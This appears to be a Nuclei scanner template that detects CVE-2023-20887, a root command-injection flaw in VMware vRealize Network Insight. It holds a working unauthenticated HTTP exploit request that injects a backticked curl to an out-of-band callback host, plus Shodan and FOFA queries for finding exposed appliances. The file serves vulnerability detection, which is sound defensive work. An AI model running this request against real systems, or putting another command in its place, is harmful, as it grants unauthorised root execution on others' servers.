67 lines
2.7 KiB
YAML
67 lines
2.7 KiB
YAML
id: CVE-2023-20887
|
|
|
|
info:
|
|
name: VMware VRealize Network Insight - Remote Code Execution
|
|
author: sinsinology
|
|
severity: critical
|
|
description: |
|
|
VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the context of 'root' on the appliance. VMWare 6.x version are
|
|
vulnerable.
|
|
remediation: |
|
|
Apply the latest security patches provided by VMware to mitigate this vulnerability.
|
|
reference:
|
|
- https://www.vmware.com/security/advisories/VMSA-2023-0012.html
|
|
- https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/
|
|
- https://github.com/sinsinology/CVE-2023-20887
|
|
- http://packetstormsecurity.com/files/173761/VMWare-Aria-Operations-For-Networks-Remote-Command-Execution.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2023-20887
|
|
cwe-id: CWE-77
|
|
epss-score: 0.94544
|
|
epss-percentile: 0.9899
|
|
cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: vmware
|
|
product: vrealize_network_insight
|
|
shodan-query: title:"VMware vRealize Network Insight"
|
|
fofa-query: title="VMware vRealize Network Insight"
|
|
tags: packetstorm,cve,cve2023,vmware,rce,msf,vrealize,insight,oast,kev
|
|
variables:
|
|
cmd: "curl {{interactsh-url}}"
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /saas./resttosaasservlet HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-thrift
|
|
|
|
[1,"createSupportBundle",1,0,{"1":{"str":"1111"},"2":{"str":"`{{cmd}}`"},"3":{"str":"value3"},"4":{"lst":["str",2,"AAAA","BBBB"]}}]
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '{"rec":'
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "application/x-thrift"
|
|
|
|
- type: word
|
|
part: body
|
|
negative: true
|
|
words:
|
|
- "Provided invalid node Id"
|
|
- "Invalid nodeId"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100c370bd5122c4829d8902479e07ffbc3dd217fb318fd043a020b0f8eb6396318f0220555eadef8e94566bcc7fb4d61860949ca2b956805d5352e2f0354b5780394d1a:922c64590222798bb761d5b6d8e72950 |